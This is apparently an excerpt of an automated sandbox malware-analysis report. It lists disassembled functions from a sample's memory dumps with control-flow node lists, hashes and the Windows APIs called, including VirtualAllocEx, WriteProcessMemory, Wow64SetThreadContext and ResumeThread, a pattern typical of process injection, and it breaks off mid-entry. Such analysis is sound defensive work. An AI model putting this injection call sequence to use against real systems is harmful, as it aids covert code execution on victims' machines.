                                                                                                          control_flow_graph 454 281b130-281b13f 455 281b141-281b14e call 281aaf4 454->455 456 281b16b-281b16f 454->456 463 281b150 455->463 464 281b164 455->464 457 281b171-281b17b 456->457 458 281b183-281b1c4 456->458 457->458 465 281b1d1-281b1df 458->465 466 281b1c6-281b1ce 458->466 509 281b156 call 281b3c8 463->509 510 281b156 call 281b3bb 463->510 464->456 467 281b1e1-281b1e6 465->467 468 281b203-281b205 465->468 466->465 471 281b1f1 467->471 472 281b1e8-281b1ef call 281ab00 467->472 473 281b208-281b20f 468->473 469 281b15c-281b15e 469->464 470 281b2a0-281b360 469->470 504 281b362-281b365 470->504 505 281b368-281b393 GetModuleHandleW 470->505 476 281b1f3-281b201 471->476 472->476 474 281b211-281b219 473->474 475 281b21c-281b223 473->475 474->475 479 281b230-281b239 call 281ab10 475->479 480 281b225-281b22d 475->480 476->473 485 281b246-281b24b 479->485 486 281b23b-281b243 479->486 480->479 488 281b269-281b276 485->488 489 281b24d-281b254 485->489 486->485 494 281b299-281b29f 488->494 495 281b278-281b296 488->495 489->488 490 281b256-281b266 call 281ab20 call 281ab30 489->490 490->488 495->494 504->505 506 281b395-281b39b 505->506 507 281b39c-281b3b0 505->507 506->507 509->469 510->469
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0281B386
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1822585478.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_2810000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule
                                                                                                          • String ID:
                                                                                                          • API String ID: 4139908857-0
                                                                                                          • Opcode ID: 4eb753a1c47f405135081d6da3107088e83b70e7b55c9e098bbb65d0c40c5248
                                                                                                          • Instruction ID: 5c8503eacc4ad4268897a2dbab159a9f10405f1b0701aa11695b73a00ce28034
                                                                                                          • Opcode Fuzzy Hash: 4eb753a1c47f405135081d6da3107088e83b70e7b55c9e098bbb65d0c40c5248
                                                                                                          • Instruction Fuzzy Hash: 3D714678A00B058FD728DF69D14475ABBF6BF48308F008A2ED48AD7A90D774E949CB91
                                                                                                          Function 028144C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 511 28144c4-28159d9 CreateActCtxA 514 28159e2-2815a3c 511->514 515 28159db-28159e1 511->515 522 2815a4b-2815a4f 514->522 523 2815a3e-2815a41 514->523 515->514 524 2815a51-2815a5d 522->524 525 2815a60 522->525 523->522 524->525 527 2815a61 525->527 527->527
                                                                                                          APIs
                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 028159C9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1822585478.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_2810000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0
                                                                                                          • Opcode ID: 0effc1f315c9aa9cffb6d9de6a2ac7f12c6c125dd68d1922ab004a3ba4009163
                                                                                                          • Instruction ID: 1af8a3e3c1775c6f440bf9a52d7527deab0011052221fcfd493c0f51f97aa482
                                                                                                          • Opcode Fuzzy Hash: 0effc1f315c9aa9cffb6d9de6a2ac7f12c6c125dd68d1922ab004a3ba4009163
                                                                                                          • Instruction Fuzzy Hash: 1B41E5B4D0071DCFDB24CFA9C844B9DBBB5BF44304F648069D408AB255DB756946CF90
                                                                                                          Function 02815917 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 528 2815917-28159d9 CreateActCtxA 530 28159e2-2815a3c 528->530 531 28159db-28159e1 528->531 538 2815a4b-2815a4f 530->538 539 2815a3e-2815a41 530->539 531->530 540 2815a51-2815a5d 538->540 541 2815a60 538->541 539->538 540->541 543 2815a61 541->543 543->543
                                                                                                          APIs
                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 028159C9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1822585478.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_2810000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0
                                                                                                          • Opcode ID: b2368c8624ce12d9eaa194e84fa96bfd3df24a9b85d142fbcc4a4590ba33aff4
                                                                                                          • Instruction ID: 2739d6fe11074d5b07ec59960fffc88e9df80e9b748e88a59b5e0cbf9feb7208
                                                                                                          • Opcode Fuzzy Hash: b2368c8624ce12d9eaa194e84fa96bfd3df24a9b85d142fbcc4a4590ba33aff4
                                                                                                          • Instruction Fuzzy Hash: 8841D4B4D00619CFDB24CFA9C984BDDBBB5BF48304F64806AD408AB255DB756946CF90
                                                                                                          Function 06F8C7C0 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 544 6f8c7c0-6f8c816 547 6f8c818-6f8c824 544->547 548 6f8c826-6f8c865 WriteProcessMemory 544->548 547->548 550 6f8c86e-6f8c89e 548->550 551 6f8c867-6f8c86d 548->551 551->550
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F8C858
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: 12101c8524dc24ffe9cdcb7a70c511cf2d47137f436451dc65a79758ad852e1d
                                                                                                          • Instruction ID: ea3edf14a2324c413ff2e16480e3e04538e9bb8cac7f3d91c7f5af87268297bc
                                                                                                          • Opcode Fuzzy Hash: 12101c8524dc24ffe9cdcb7a70c511cf2d47137f436451dc65a79758ad852e1d
                                                                                                          • Instruction Fuzzy Hash: 082157B1D003499FCB10DFA9C885BDEBBF1FF48310F10842AE558A7251C7749984CBA4
                                                                                                          Function 06F8C7C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 555 6f8c7c8-6f8c816 557 6f8c818-6f8c824 555->557 558 6f8c826-6f8c865 WriteProcessMemory 555->558 557->558 560 6f8c86e-6f8c89e 558->560 561 6f8c867-6f8c86d 558->561 561->560
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F8C858
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: 7405b8abf51f5f8f853482e10de1994a5467bac6776c88fba41b8d5414c06ad4
                                                                                                          • Instruction ID: eb64204a646e98fa99c4c414a1dedaf1f4762db7ec5ead60a8015a67cb7b53df
                                                                                                          • Opcode Fuzzy Hash: 7405b8abf51f5f8f853482e10de1994a5467bac6776c88fba41b8d5414c06ad4
                                                                                                          • Instruction Fuzzy Hash: 1A2125B1D003599FCB10DFAAC985BEEBBF5FF48310F10842AE959A7250C7789944CBA4
                                                                                                          Function 06F8C8B2 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 565 6f8c8b2-6f8c945 ReadProcessMemory 570 6f8c94e-6f8c97e 565->570 571 6f8c947-6f8c94d 565->571 571->570
                                                                                                          APIs
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F8C938
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 1726664587-0
                                                                                                          • Opcode ID: 0cf2eba7424fd5d18ca40e3dedcb51f346d8ba6fab1c18ad49b90b66e44e335f
                                                                                                          • Instruction ID: 61906fe98e37abc99bc1baacb1d1319a85db00fb23571bfcf4d0ec27ec61b1c7
                                                                                                          • Opcode Fuzzy Hash: 0cf2eba7424fd5d18ca40e3dedcb51f346d8ba6fab1c18ad49b90b66e44e335f
                                                                                                          • Instruction Fuzzy Hash: 232125B28002599FCB10DFA9D841AEEFFF5FF48320F10842AE559A7250C7399945CBA4
                                                                                                          Function 06F8C1F3 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 575 6f8c1f3-6f8c243 578 6f8c253-6f8c283 Wow64SetThreadContext 575->578 579 6f8c245-6f8c251 575->579 581 6f8c28c-6f8c2bc 578->581 582 6f8c285-6f8c28b 578->582 579->578 582->581
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F8C276
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 5e81d956efc664ae25b9c32409d6abf62b39fabd03f813432ad6ff6d283efd4a
                                                                                                          • Instruction ID: 94c4139d8aef4589b59f60d8168d0c7d54f0527cf4cad5e14c239b4008a1415c
                                                                                                          • Opcode Fuzzy Hash: 5e81d956efc664ae25b9c32409d6abf62b39fabd03f813432ad6ff6d283efd4a
                                                                                                          • Instruction Fuzzy Hash: 47213A71D00209CFDB54DFAAC885BEEBBF4EF88324F108429D459A7251CB789945CFA5
                                                                                                          Function 06F8C1F8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 586 6f8c1f8-6f8c243 588 6f8c253-6f8c283 Wow64SetThreadContext 586->588 589 6f8c245-6f8c251 586->589 591 6f8c28c-6f8c2bc 588->591 592 6f8c285-6f8c28b 588->592 589->588 592->591
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F8C276
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 9317f9dc0512f39cf8bfdcd6aab3cb8812ed97607e3698607c3f43293c6f3ff4
                                                                                                          • Instruction ID: 2fdc0883f39e380108bb0e6c3adecdead3d23209f926944effcc9f79d8532f50
                                                                                                          • Opcode Fuzzy Hash: 9317f9dc0512f39cf8bfdcd6aab3cb8812ed97607e3698607c3f43293c6f3ff4
                                                                                                          • Instruction Fuzzy Hash: 0B2149B1D003098FDB50DFAAC8857EEBBF4EF88324F108429D459A7250C7789944CFA4
                                                                                                          Function 06F8C8B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 596 6f8c8b8-6f8c945 ReadProcessMemory 599 6f8c94e-6f8c97e 596->599 600 6f8c947-6f8c94d 596->600 600->599
                                                                                                          APIs
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F8C938
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 1726664587-0
                                                                                                          • Opcode ID: a1b51e4e06303f80367a855e9e9d99454f47c9bf517f5712b7734412f0f0b00a
                                                                                                          • Instruction ID: ea1766d719da371a7b6a67aa77d760489dd596bb68a049c0c7d24a29a2696301
                                                                                                          • Opcode Fuzzy Hash: a1b51e4e06303f80367a855e9e9d99454f47c9bf517f5712b7734412f0f0b00a
                                                                                                          • Instruction Fuzzy Hash: 552125B1C002599FCB10DFAAC885AEEFBF5FF48324F50842AE559A7250C7389945CBA4
                                                                                                          Function 0281D608 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 604 281d608-281d69c DuplicateHandle 605 281d6a5-281d6c2 604->605 606 281d69e-281d6a4 604->606 606->605
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0281D68F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1822585478.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_2810000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: f2481449b120db537a953d80759ad40bd1efe6889ba41b1ab4888e613662cc4e
                                                                                                          • Instruction ID: ee859a01e251fbb2f42a9f5e121ef7748a24ad92e7d90b43df473a4a2923455e
                                                                                                          • Opcode Fuzzy Hash: f2481449b120db537a953d80759ad40bd1efe6889ba41b1ab4888e613662cc4e
                                                                                                          • Instruction Fuzzy Hash: EE21E4B5900208DFDB10CF9AD984ADEBBF8EB48310F14841AE958A3350D374A944CFA4
                                                                                                          Function 0281D600 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0281D68F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1822585478.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_2810000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: 4c857fba0f81c8167d7577349f4de98231930cde2787e6957b437515b1ae0c66
                                                                                                          • Instruction ID: 55a24f34c57f5116cec890bec5f8589a2cf9796970ab7e5409bd6c85f11afbe9
                                                                                                          • Opcode Fuzzy Hash: 4c857fba0f81c8167d7577349f4de98231930cde2787e6957b437515b1ae0c66
                                                                                                          • Instruction Fuzzy Hash: 852114B9900248DFDB10CFA9D584ADEBBF5EB08310F14841AE958E7360D374A954CFA5
                                                                                                          Function 06F8C700 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F8C776
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 0197ac2bb6e74f0572c144f088d54ea811e828ad8a20caec6e8346ca05b135c1
                                                                                                          • Instruction ID: c089ce0262c3527e78c00b25d8bc75415b431f113e4dac30166d5f72b546c803
                                                                                                          • Opcode Fuzzy Hash: 0197ac2bb6e74f0572c144f088d54ea811e828ad8a20caec6e8346ca05b135c1
                                                                                                          • Instruction Fuzzy Hash: 30218976800248CFCB10DFAAC845ADEBFF5EF48320F20841AE559A7250C7359585CFA1
                                                                                                          Function 06F8C708 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F8C776
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 0c86631ef9abfa65bd8f3ac93b15cf038d1322daf9b8a974bd299918d3faaa30
                                                                                                          • Instruction ID: 9a70e21f652eafd54b112193a0436c7feb363bf71253cbfe565a4b210e9c2ead
                                                                                                          • Opcode Fuzzy Hash: 0c86631ef9abfa65bd8f3ac93b15cf038d1322daf9b8a974bd299918d3faaa30
                                                                                                          • Instruction Fuzzy Hash: 0C1134B29002499FCB10DFAAC845BDFBFF5EF88320F208419E559A7260C775A944CFA4
                                                                                                          Function 06F8BD09 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: c555928d5bf1ecfb7d2240711c5b47fc0293f6bdc87675cce6f801f88a199395
                                                                                                          • Instruction ID: baa2b9f0b78303311d1767beb13043d9f219f3003f3ffc5deabaa429a62dd8b8
                                                                                                          • Opcode Fuzzy Hash: c555928d5bf1ecfb7d2240711c5b47fc0293f6bdc87675cce6f801f88a199395
                                                                                                          • Instruction Fuzzy Hash: 711149B1D002498FDB20DFAAC4457DEFFF5EF88324F208419D459A7250CB756944CB94
                                                                                                          Function 06F8BD10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: 7e90b60c3c4c810b133c70845c15bdbc888fd16cbd86038e8d527864ca51c890
                                                                                                          • Instruction ID: b80b2a40caa2bbdb4b7209ad547cd9d51e4a317fed78e0bd3c1905064aedb01b
                                                                                                          • Opcode Fuzzy Hash: 7e90b60c3c4c810b133c70845c15bdbc888fd16cbd86038e8d527864ca51c890
                                                                                                          • Instruction Fuzzy Hash: 371136B1D002498FCB20DFAAC8457DEFBF5EF88324F208429D459A7250CB75A944CFA4
                                                                                                          Function 0281B320 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0281B386
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1822585478.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_2810000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule
                                                                                                          • String ID:
                                                                                                          • API String ID: 4139908857-0
                                                                                                          • Opcode ID: 09138988ed9b3e06c7b7cde2ae1afb3ab534de0103165bcde38ceac369eeffd5
                                                                                                          • Instruction ID: 205d4402a1657b2bbf71bda965842586124378ec48c9bacae696fda74f74ec28
                                                                                                          • Opcode Fuzzy Hash: 09138988ed9b3e06c7b7cde2ae1afb3ab534de0103165bcde38ceac369eeffd5
                                                                                                          • Instruction Fuzzy Hash: F01110B9C003498FCB10CF9AD444ADEFBF8EB88324F14842AD419B7250C375A545CFA1
                                                                                                          Function 06F8FED1 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 06F8FF35
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          • Opcode ID: 12b7d418781ccef318cdde3e202c19350e3a2da5dd48e5fcaac183cc4f8c04ea
                                                                                                          • Instruction ID: 59390a0df7b021aa93bd22cce78f054ebc1101523edc465c265735e28454fedc
                                                                                                          • Opcode Fuzzy Hash: 12b7d418781ccef318cdde3e202c19350e3a2da5dd48e5fcaac183cc4f8c04ea
                                                                                                          • Instruction Fuzzy Hash: 661115B5800348DFDB10DF99D945BDEBFF8EB58324F10845AE558A7210C375A984CFA5
                                                                                                          Function 06F8FED8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 06F8FF35
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1835289548.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6f80000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          • Opcode ID: 79074f8301f38ccb9d43f7b88fa0a25a3b6489cd34cb246edb8374f19fb1cf4f
                                                                                                          • Instruction ID: bbbf40b8a93ce752dea5e665953b52d8bcefeb7b2e20a70375ad6cc9f57c622d
                                                                                                          • Opcode Fuzzy Hash: 79074f8301f38ccb9d43f7b88fa0a25a3b6489cd34cb246edb8374f19fb1cf4f
                                                                                                          • Instruction Fuzzy Hash: 561100B5800348DFCB10DF9AC889BDEBBF8EB48324F10845AE558A7210C375A984CFA1
                                                                                                          Function 0A551128 Relevance: .3, Instructions: 260COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1837984375.000000000A550000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A550000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_a550000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d2d8034c6e4f9bff61052e1d691ba537db9c3c9d5629f158230155aa56566c95
                                                                                                          • Instruction ID: 99923fddff2547ccca233568d19c14aaa1046bccc02204c03722ef24e5bd5680
                                                                                                          • Opcode Fuzzy Hash: d2d8034c6e4f9bff61052e1d691ba537db9c3c9d5629f158230155aa56566c95
                                                                                                          • Instruction Fuzzy Hash: 82A14934B012049FD714EB69D564BAEBBF6BF89300F2541A9E905EB3A1CB31DD01CB51
                                                                                                          Function 00ADD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1820046682.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_add000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cf0c5289eaf5937352fe908565001eccc3a0cfebe20cfabf4e66b0c9709a0a17
                                                                                                          • Instruction ID: bd0bfd9e69af8dc0d64559fef1a6d26193067be09089727c11ee44fab34e7cb0
                                                                                                          • Opcode Fuzzy Hash: cf0c5289eaf5937352fe908565001eccc3a0cfebe20cfabf4e66b0c9709a0a17
                                                                                                          • Instruction Fuzzy Hash: B82103B1540240EFCB05DF14E9C0B26BF65FB98318F20C56AE80A0B356C336D856CBA1
                                                                                                          Function 00ADD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1820046682.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_add000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 01bc47fa013dff2b7d54bab5a05d6d14ee3d32f486c87ba85f94ce37291fbb3d
                                                                                                          • Instruction ID: 0851b1e90506577a8ecd98cbc5f593e2824baa7059d449e8db092d49f8cbaa96
                                                                                                          • Opcode Fuzzy Hash: 01bc47fa013dff2b7d54bab5a05d6d14ee3d32f486c87ba85f94ce37291fbb3d
                                                                                                          • Instruction Fuzzy Hash: 672125B1500204EFDB05DF14D9C4B2ABF75FB98324F20C56AE90A4F356C336E856CAA2
                                                                                                          Function 00DED01C Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1821488540.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_ded000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 60f66ee3a086ee40ea91bf7a1205a22ece65f51911c7cf7087a8a5cafb8c5da8
                                                                                                          • Instruction ID: 268e2ed1f6914781503a202e08eca91a83b99ffd08661f429e311e454bfc37b9
                                                                                                          • Opcode Fuzzy Hash: 60f66ee3a086ee40ea91bf7a1205a22ece65f51911c7cf7087a8a5cafb8c5da8
                                                                                                          • Instruction Fuzzy Hash: 0621F271604280DFCB14EF15D984B26BBA6FB84314F28C569E84A4B296CB3AD847CA71
                                                                                                          Function 00DED1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.1821488540.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_ded000_jwvzGqkYNEejno.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
